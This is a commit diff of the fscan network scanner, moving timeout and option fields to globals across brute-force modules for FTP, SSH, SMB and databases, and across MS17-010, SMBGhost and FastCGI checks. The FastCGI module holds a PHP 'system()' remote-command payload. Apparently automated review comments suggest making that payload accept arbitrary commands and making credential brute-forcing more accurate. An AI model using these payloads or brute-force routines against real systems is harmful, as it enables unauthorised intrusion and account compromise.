mirror of https://github.com/qwqdanchun/fscan.git
减少info结构体大小
This commit is contained in:
parent
8e1db5995e
commit
b9b5eb9ce4
|
@ -103,7 +103,7 @@ func SmbGhost(info *common.HostInfo) error {
|
|||
}
|
||||
|
||||
func SmbGhostScan(info *common.HostInfo) error {
|
||||
ip, port, timeout := info.Host, 445, time.Duration(info.Timeout)*time.Second
|
||||
ip, port, timeout := info.Host, 445, time.Duration(common.Timeout)*time.Second
|
||||
addr := fmt.Sprintf("%s:%v", info.Host, port)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", addr, timeout)
|
||||
defer func() {
|
||||
|
|
|
@ -56,7 +56,7 @@ func NetBIOS(info *common.HostInfo) error {
|
|||
}
|
||||
msg += fmt.Sprintf("[*] %-15s%-5s %s\\%-15s %s", info.Host, isdc, nbname.group, nbname.unique, nbname.osversion)
|
||||
|
||||
if info.Scantype == "netbios" {
|
||||
if common.Scantype == "netbios" {
|
||||
msg += "\n-------------------------------------------\n" + nbname.msg
|
||||
}
|
||||
if len(nbname.group) > 0 || len(nbname.unique) > 0 {
|
||||
|
@ -75,16 +75,16 @@ func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
|
|||
payload0 = append(payload0, []byte("\x00 EOENEBFACACACACACACACACACACACACA\x00")...)
|
||||
}
|
||||
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil{
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
}
|
||||
}()
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
|
@ -194,16 +194,16 @@ func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
|
|||
func GetNbnsname(info *common.HostInfo) (nbname NbnsName, err error) {
|
||||
senddata1 := []byte{102, 102, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 32, 67, 75, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 0, 0, 33, 0, 1}
|
||||
realhost := fmt.Sprintf("%s:%v", info.Host, 137)
|
||||
conn, err := net.DialTimeout("udp", realhost, time.Duration(info.Timeout)*time.Second)
|
||||
conn, err := net.DialTimeout("udp", realhost, time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil{
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
}
|
||||
}()
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
|
|
|
@ -23,17 +23,17 @@ func FcgiScan(info *common.HostInfo) {
|
|||
return
|
||||
}
|
||||
url := "/etc/issue"
|
||||
if info.Path != "" {
|
||||
url = info.Path
|
||||
if common.Path != "" {
|
||||
url = common.Path
|
||||
}
|
||||
addr := fmt.Sprintf("%v:%v", info.Host, info.Ports)
|
||||
var reqParams string
|
||||
var cutLine = "-----ASDGTasdkk361363s-----\n"
|
||||
switch {
|
||||
case info.Command == "read":
|
||||
case common.Command == "read":
|
||||
reqParams = ""
|
||||
case info.Command != "":
|
||||
reqParams = "<?php system('" + info.Command + "');die('" + cutLine + "');?>"
|
||||
case common.Command != "":
|
||||
reqParams = "<?php system('" + common.Command + "');die('" + cutLine + "');?>"
|
||||
default:
|
||||
reqParams = "<?php system('whoami');die('" + cutLine + "');?>"
|
||||
}
|
||||
|
@ -54,7 +54,7 @@ func FcgiScan(info *common.HostInfo) {
|
|||
env["REQUEST_METHOD"] = "GET"
|
||||
}
|
||||
|
||||
fcgi, err := New(addr, info.Timeout)
|
||||
fcgi, err := New(addr, common.Timeout)
|
||||
defer func() {
|
||||
if fcgi.rwc != nil {
|
||||
fcgi.rwc.Close()
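Review bot: The deferred close dereferences `fcgi.rwc` without first checking that `New(addr, common.Timeout)` returned a non-nil client, so if `New` fails and hands back a nil pointer the defer panics instead of FcgiScan returning cleanly; guard it with `if fcgi != nil && fcgi.rwc != nil {`. In the earlier hunk `common.Command` is spliced into a single-quoted PHP string (`"<?php system('" + common.Command + "');..."`), so any command containing `'` breaks the payload; escaping it with `strings.ReplaceAll(common.Command, "'", "\\'")`, or sending it base64-encoded and decoding it in the PHP stub, would make arbitrary commands usable. Whether `New` returns nil on error is not visible here, and FcgiScan continues outside both hunks.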
|
||||
|
|
|
@ -22,7 +22,7 @@ func Findnet(info *common.HostInfo) error {
|
|||
|
||||
func FindnetScan(info *common.HostInfo) error {
|
||||
realhost := fmt.Sprintf("%s:%v", info.Host, 135)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
|
@ -31,7 +31,7 @@ func FindnetScan(info *common.HostInfo) error {
|
|||
if err != nil {
|
||||
return err
|
||||
}
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
|
|
@ -38,7 +38,7 @@ func FtpScan(info *common.HostInfo) (tmperr error) {
|
|||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ftp"])*len(common.Passwords)) * info.Timeout) {
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ftp"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
@ -50,7 +50,7 @@ func FtpScan(info *common.HostInfo) (tmperr error) {
|
|||
func FtpConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
|
||||
flag = false
|
||||
Host, Port, Username, Password := info.Host, info.Ports, user, pass
|
||||
conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(info.Timeout)*time.Second)
|
||||
conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(common.Timeout)*time.Second)
|
||||
if err == nil {
|
||||
err = conn.Login(Username, Password)
|
||||
if err == nil {
|
||||
|
|
|
@ -9,14 +9,14 @@ import (
|
|||
|
||||
func MemcachedScan(info *common.HostInfo) (err error) {
|
||||
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
|
||||
client, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
|
||||
client, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if client != nil{
|
||||
if client != nil {
|
||||
client.Close()
|
||||
}
|
||||
}()
|
||||
if err == nil {
|
||||
err = client.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
|
||||
err = client.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err == nil {
|
||||
_, err = client.Write([]byte("stats\n")) //Set the key randomly to prevent the key on the server from being overwritten
|
||||
if err == nil {
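Review bot: The trailing comment on the `client.Write([]byte("stats\n"))` line talks about setting a random key so the server's key is not overwritten, but the code sends the read-only `stats` command and writes nothing, so the comment is stale and misleads anyone auditing what the scanner does to a target. Replace it with `// "stats" is read-only: nothing is written to the target's keyspace`. MemcachedScan continues past the end of the hunk.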
|
||||
|
|
|
@ -12,7 +12,6 @@ func MongodbScan(info *common.HostInfo) error {
|
|||
if common.IsBrute {
|
||||
return nil
|
||||
}
|
||||
|
||||
_, err := MongodbUnauth(info)
|
||||
if err != nil {
|
||||
errlog := fmt.Sprintf("[-] Mongodb %v:%v %v", info.Host, info.Ports, err)
|
||||
|
@ -25,7 +24,7 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
|
|||
flag = false
|
||||
senddata := []byte{72, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 1, 0, 0, 0, 33, 0, 0, 0, 2, 103, 101, 116, 76, 111, 103, 0, 16, 0, 0, 0, 115, 116, 97, 114, 116, 117, 112, 87, 97, 114, 110, 105, 110, 103, 115, 0, 0}
|
||||
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
|
@ -34,7 +33,7 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
|
|||
if err != nil {
|
||||
return flag, err
|
||||
}
|
||||
err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
|
||||
err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err != nil {
|
||||
return flag, err
|
||||
}
|
||||
|
|
|
@ -33,7 +33,7 @@ func MS17010(info *common.HostInfo) error {
|
|||
func MS17010Scan(info *common.HostInfo) error {
|
||||
ip := info.Host
|
||||
// connecting to a host in LAN if reachable should be very quick
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(info.Timeout)*time.Second)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
|
@ -43,7 +43,7 @@ func MS17010Scan(info *common.HostInfo) error {
|
|||
//fmt.Printf("failed to connect to %s\n", ip)
|
||||
return err
|
||||
}
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err != nil {
|
||||
//fmt.Printf("failed to connect to %s\n", ip)
|
||||
return err
|
||||
|
|
|
@ -27,7 +27,7 @@ func MssqlScan(info *common.HostInfo) (tmperr error) {
|
|||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mssql"])*len(common.Passwords)) * info.Timeout) {
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mssql"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
@ -39,11 +39,11 @@ func MssqlScan(info *common.HostInfo) (tmperr error) {
|
|||
func MssqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
|
||||
flag = false
|
||||
Host, Port, Username, Password := info.Host, info.Ports, user, pass
|
||||
dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(info.Timeout)*time.Second)
|
||||
dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(common.Timeout)*time.Second)
|
||||
db, err := sql.Open("mssql", dataSourceName)
|
||||
if err == nil {
|
||||
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
|
||||
db.SetConnMaxIdleTime(time.Duration(info.Timeout) * time.Second)
|
||||
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
|
||||
db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
|
||||
db.SetMaxIdleConns(0)
|
||||
defer db.Close()
|
||||
err = db.Ping()
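Review bot: The `dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;...")` line splices `Username` and `Password` into a `key=value;` connection string unescaped, so a wordlist entry containing `;` (or `=`) truncates or corrupts the string and the attempt fails for the wrong reason — a silent false negative inside a brute-force loop. The driver also accepts the `sqlserver://` URL form, so building it as `(&url.URL{Scheme: "sqlserver", User: url.UserPassword(Username, Password), Host: net.JoinHostPort(Host, Port), RawQuery: "encrypt=disable"}).String()` percent-encodes credentials; the remaining timeout parameter would move into `RawQuery` under whatever key the driver documents, which I cannot confirm from here. MssqlConn continues outside the hunk.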
|
||||
|
|
|
@ -27,7 +27,7 @@ func MysqlScan(info *common.HostInfo) (tmperr error) {
|
|||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mysql"])*len(common.Passwords)) * info.Timeout) {
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mysql"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
@ -39,11 +39,11 @@ func MysqlScan(info *common.HostInfo) (tmperr error) {
|
|||
func MysqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
|
||||
flag = false
|
||||
Host, Port, Username, Password := info.Host, info.Ports, user, pass
|
||||
dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(info.Timeout)*time.Second)
|
||||
dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(common.Timeout)*time.Second)
|
||||
db, err := sql.Open("mysql", dataSourceName)
|
||||
if err == nil {
|
||||
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
|
||||
db.SetConnMaxIdleTime(time.Duration(info.Timeout) * time.Second)
|
||||
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
|
||||
db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
|
||||
db.SetMaxIdleConns(0)
|
||||
defer db.Close()
|
||||
err = db.Ping()
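Review bot: The DSN on the `dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?...")` line embeds `Username` and `Password` raw; the MySQL driver, as far as I recall, finds the database name at the last `/` and the credentials at the last `@` before it, so a password containing `/` is misparsed and the attempt fails without the server ever being asked. Let the driver build and escape the DSN instead of assembling it by hand (`mysql.NewConfig()` is needed rather than a zero `mysql.Config`, because it enables native password auth). This requires a named import of the driver package, which is presumably only blank-imported today. MysqlConn continues outside the hunk.
```go
func MysqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
	flag = false
	Host, Port, Username, Password := info.Host, info.Ports, user, pass
	// Let the driver escape credentials; a raw Sprintf DSN misparses passwords containing '/'.
	cfg := mysql.NewConfig()
	cfg.User, cfg.Passwd = Username, Password
	cfg.Net, cfg.Addr, cfg.DBName = "tcp", net.JoinHostPort(Host, Port), "mysql"
	cfg.Params = map[string]string{"charset": "utf8"}
	cfg.Timeout = time.Duration(common.Timeout) * time.Second
	db, err := sql.Open("mysql", cfg.FormatDSN())
	// … unchanged: connection lifetime settings, Ping and result handling …
```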
|
||||
|
|
|
@ -27,7 +27,7 @@ func OracleScan(info *common.HostInfo) (tmperr error) {
|
|||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["oracle"])*len(common.Passwords)) * info.Timeout) {
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["oracle"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
@ -42,8 +42,8 @@ func OracleConn(info *common.HostInfo, user string, pass string) (flag bool, err
|
|||
dataSourceName := fmt.Sprintf("oracle://%s:%s@%s:%s/orcl", Username, Password, Host, Port)
|
||||
db, err := sql.Open("oracle", dataSourceName)
|
||||
if err == nil {
|
||||
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
|
||||
db.SetConnMaxIdleTime(time.Duration(info.Timeout) * time.Second)
|
||||
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
|
||||
db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
|
||||
db.SetMaxIdleConns(0)
|
||||
defer db.Close()
|
||||
err = db.Ping()
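Review bot: The `oracle://%s:%s@%s:%s/orcl` DSN is a URL, yet `Username` and `Password` are inserted without percent-encoding, so wordlist entries with `@`, `/`, `#`, `?` or `%` produce a malformed or misparsed URL and the attempt fails before any authentication happens. Build it as `(&url.URL{Scheme: "oracle", User: url.UserPassword(Username, Password), Host: net.JoinHostPort(Host, Port), Path: "/orcl"}).String()`. The hard-coded `orcl` service name is a separate, pre-existing source of false negatives against instances with another SID. OracleConn starts above the hunk.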
|
||||
|
|
|
@ -27,7 +27,7 @@ func PostgresScan(info *common.HostInfo) (tmperr error) {
|
|||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["postgresql"])*len(common.Passwords)) * info.Timeout) {
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["postgresql"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
@ -42,7 +42,7 @@ func PostgresConn(info *common.HostInfo, user string, pass string) (flag bool, e
|
|||
dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host, Port, "postgres", "disable")
|
||||
db, err := sql.Open("postgres", dataSourceName)
|
||||
if err == nil {
|
||||
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
|
||||
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
|
||||
defer db.Close()
|
||||
err = db.Ping()
|
||||
if err == nil {
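Review bot: The `postgres://%v:%v@%v:%v/%v?sslmode=%v` line puts `Username` and `Password` into a URL unescaped, so a password with `@`, `/`, `#` or `%` yields a parse error or a wrong host and the credential is reported as failed without being tried. Use `(&url.URL{Scheme: "postgres", User: url.UserPassword(Username, Password), Host: net.JoinHostPort(Host, Port), Path: "/postgres", RawQuery: "sslmode=disable"}).String()`. Unlike the other drivers in this change, no connect timeout reaches the DSN here — only `SetConnMaxLifetime` is set — so a slow target can hold `db.Ping()` well past `common.Timeout`; lib/pq honours a `connect_timeout=` query parameter (seconds) if that is the driver in use. PostgresConn starts above the hunk.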
|
||||
|
|
|
@ -48,7 +48,7 @@ func RdpScan(info *common.HostInfo) (tmperr error) {
|
|||
|
||||
for i := 0; i < common.BruteThread; i++ {
|
||||
wg.Add(1)
|
||||
go worker(info.Host, info.Domain, port, &wg, brlist, &signal, &num, all, &mutex, info.Timeout)
|
||||
go worker(info.Host, common.Domain, port, &wg, brlist, &signal, &num, all, &mutex, common.Timeout)
|
||||
}
|
||||
|
||||
close(brlist)
|
||||
|
|
|
@ -36,7 +36,7 @@ func RedisScan(info *common.HostInfo) (tmperr error) {
|
|||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Passwords)) * info.Timeout) {
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
@ -47,7 +47,7 @@ func RedisScan(info *common.HostInfo) (tmperr error) {
|
|||
func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
|
||||
flag = false
|
||||
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
|
@ -56,7 +56,7 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
|
|||
if err != nil {
|
||||
return flag, err
|
||||
}
|
||||
err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
|
||||
err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err != nil {
|
||||
return flag, err
|
||||
}
|
||||
|
@ -87,7 +87,7 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
|
|||
func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
|
||||
flag = false
|
||||
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
|
@ -96,7 +96,7 @@ func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
|
|||
if err != nil {
|
||||
return flag, err
|
||||
}
|
||||
err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
|
||||
err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err != nil {
|
||||
return flag, err
|
||||
}
|
||||
|
|
|
@ -26,17 +26,17 @@ func Scan(info common.HostInfo) {
|
|||
Hosts = CheckLive(Hosts, common.Ping)
|
||||
fmt.Println("[*] Icmp alive hosts len is:", len(Hosts))
|
||||
}
|
||||
if info.Scantype == "icmp" {
|
||||
if common.Scantype == "icmp" {
|
||||
common.LogWG.Wait()
|
||||
return
|
||||
}
|
||||
var AlivePorts []string
|
||||
if info.Scantype == "webonly" {
|
||||
if common.Scantype == "webonly" {
|
||||
AlivePorts = NoPortScan(Hosts, info.Ports)
|
||||
} else {
|
||||
AlivePorts = PortScan(Hosts, info.Ports, info.Timeout)
|
||||
AlivePorts = PortScan(Hosts, info.Ports, common.Timeout)
|
||||
fmt.Println("[*] alive ports len is:", len(AlivePorts))
|
||||
if info.Scantype == "portscan" {
|
||||
if common.Scantype == "portscan" {
|
||||
common.LogWG.Wait()
|
||||
return
|
||||
}
|
||||
|
@ -49,7 +49,7 @@ func Scan(info common.HostInfo) {
|
|||
fmt.Println("start vulscan")
|
||||
for _, targetIP := range AlivePorts {
|
||||
info.Host, info.Ports = strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1]
|
||||
if info.Scantype == "all" || info.Scantype == "main" {
|
||||
if common.Scantype == "all" || common.Scantype == "main" {
|
||||
switch {
|
||||
case info.Ports == "135":
|
||||
AddScan(info.Ports, info, ch, &wg) //findnet
|
||||
|
@ -66,7 +66,7 @@ func Scan(info common.HostInfo) {
|
|||
AddScan("1000003", info, ch, &wg) //webtitle
|
||||
}
|
||||
} else {
|
||||
port, _ := common.PORTList[info.Scantype]
|
||||
port, _ := common.PORTList[common.Scantype]
|
||||
scantype := strconv.Itoa(port)
|
||||
AddScan(scantype, info, ch, &wg)
|
||||
}
|
||||
|
|
|
@ -20,8 +20,8 @@ func SmbScan(info *common.HostInfo) (tmperr error) {
|
|||
flag, err := doWithTimeOut(info, user, pass)
|
||||
if flag == true && err == nil {
|
||||
var result string
|
||||
if info.Domain != "" {
|
||||
result = fmt.Sprintf("[+] SMB:%v:%v:%v\\%v %v", info.Host, info.Ports, info.Domain, user, pass)
|
||||
if common.Domain != "" {
|
||||
result = fmt.Sprintf("[+] SMB:%v:%v:%v\\%v %v", info.Host, info.Ports, common.Domain, user, pass)
|
||||
} else {
|
||||
result = fmt.Sprintf("[+] SMB:%v:%v:%v %v", info.Host, info.Ports, user, pass)
|
||||
}
|
||||
|
@ -35,7 +35,7 @@ func SmbScan(info *common.HostInfo) (tmperr error) {
|
|||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * info.Timeout) {
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
@ -52,7 +52,7 @@ func SmblConn(info *common.HostInfo, user string, pass string, signal chan struc
|
|||
Port: 445,
|
||||
User: Username,
|
||||
Password: Password,
|
||||
Domain: info.Domain,
|
||||
Domain: common.Domain,
|
||||
Workstation: "",
|
||||
}
|
||||
|
||||
|
@ -75,7 +75,7 @@ func doWithTimeOut(info *common.HostInfo, user string, pass string) (flag bool,
|
|||
select {
|
||||
case <-signal:
|
||||
return flag, err
|
||||
case <-time.After(time.Duration(info.Timeout) * time.Second):
|
||||
case <-time.After(time.Duration(common.Timeout) * time.Second):
|
||||
return false, errors.New("time out")
|
||||
}
|
||||
}
|
||||
|
|
|
@ -29,11 +29,11 @@ func SshScan(info *common.HostInfo) (tmperr error) {
|
|||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ssh"])*len(common.Passwords)) * info.Timeout) {
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ssh"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
if info.SshKey != "" {
|
||||
if common.SshKey != "" {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
@ -45,8 +45,8 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
|
|||
flag = false
|
||||
Host, Port, Username, Password := info.Host, info.Ports, user, pass
|
||||
Auth := []ssh.AuthMethod{}
|
||||
if info.SshKey != "" {
|
||||
pemBytes, err := ioutil.ReadFile(info.SshKey)
|
||||
if common.SshKey != "" {
|
||||
pemBytes, err := ioutil.ReadFile(common.SshKey)
|
||||
if err != nil {
|
||||
return false, errors.New("read key failed" + err.Error())
|
||||
}
|
||||
|
@ -62,7 +62,7 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
|
|||
config := &ssh.ClientConfig{
|
||||
User: Username,
|
||||
Auth: Auth,
|
||||
Timeout: time.Duration(info.Timeout) * time.Second,
|
||||
Timeout: time.Duration(common.Timeout) * time.Second,
|
||||
HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error {
|
||||
return nil
|
||||
},
|
||||
|
@ -76,16 +76,16 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
|
|||
defer session.Close()
|
||||
flag = true
|
||||
var result string
|
||||
if info.Command != "" {
|
||||
combo, _ := session.CombinedOutput(info.Command)
|
||||
if common.Command != "" {
|
||||
combo, _ := session.CombinedOutput(common.Command)
|
||||
result = fmt.Sprintf("[+] SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
|
||||
if info.SshKey != "" {
|
||||
if common.SshKey != "" {
|
||||
result = fmt.Sprintf("[+] SSH:%v:%v sshkey correct \n %v", Host, Port, string(combo))
|
||||
}
|
||||
common.LogSuccess(result)
|
||||
} else {
|
||||
result = fmt.Sprintf("[+] SSH:%v:%v:%v %v", Host, Port, Username, Password)
|
||||
if info.SshKey != "" {
|
||||
if common.SshKey != "" {
|
||||
result = fmt.Sprintf("[+] SSH:%v:%v sshkey correct", Host, Port)
|
||||
}
|
||||
common.LogSuccess(result)
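Review bot: `ioutil.ReadFile(common.SshKey)` inside SshConn re-reads and re-parses the private key on every user/password attempt, and now that the path is a process-wide global there is no per-host reason for it; load the signer once (in the flag parsing step, or lazily under a `sync.Once`) and reuse it across the brute-force loop, which also reports a bad key once instead of once per attempt. The error `errors.New("read key failed" + err.Error())` runs the message straight into the cause; `fmt.Errorf("read key %s: %w", common.SshKey, err)` is clearer. The `HostKeyCallback` that returns nil is the right choice for a scanner, but `ssh.InsecureIgnoreHostKey()` states that intent explicitly. SshConn continues outside the last hunk.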
|
||||
|
|
|
@ -38,13 +38,13 @@ func GOWebTitle(info *common.HostInfo) (err error, CheckData []WebScan.CheckData
|
|||
info.Url = fmt.Sprintf("https://%s", info.Host)
|
||||
default:
|
||||
host := fmt.Sprintf("%s:%s", info.Host, info.Ports)
|
||||
protocol := GetProtocol(host, info.Timeout)
|
||||
protocol := GetProtocol(host, common.Timeout)
|
||||
info.Url = fmt.Sprintf("%s://%s:%s", protocol, info.Host, info.Ports)
|
||||
}
|
||||
} else {
|
||||
if !strings.Contains(info.Url, "://") {
|
||||
host := strings.Split(info.Url, "/")[0]
|
||||
protocol := GetProtocol(host, info.Timeout)
|
||||
protocol := GetProtocol(host, common.Timeout)
|
||||
info.Url = fmt.Sprintf("%s://%s", protocol, info.Url)
|
||||
}
|
||||
}
|
||||
|
|
|
@ -77,6 +77,7 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
|
|||
return false, err, ""
|
||||
}
|
||||
variableMap := make(map[string]interface{})
|
||||
defer func() { variableMap = nil }()
|
||||
variableMap["request"] = req
|
||||
for _, item := range p.Set {
|
||||
k, expression := item.Key, item.Value
|
||||
|
@ -123,7 +124,7 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
|
|||
req.Url.Path = rule.Path
|
||||
}
|
||||
// 某些poc没有区分path和query,需要处理
|
||||
//req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")
|
||||
req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")
|
||||
//req.Url.Path = strings.ReplaceAll(req.Url.Path, "+", "%20")
|
||||
|
||||
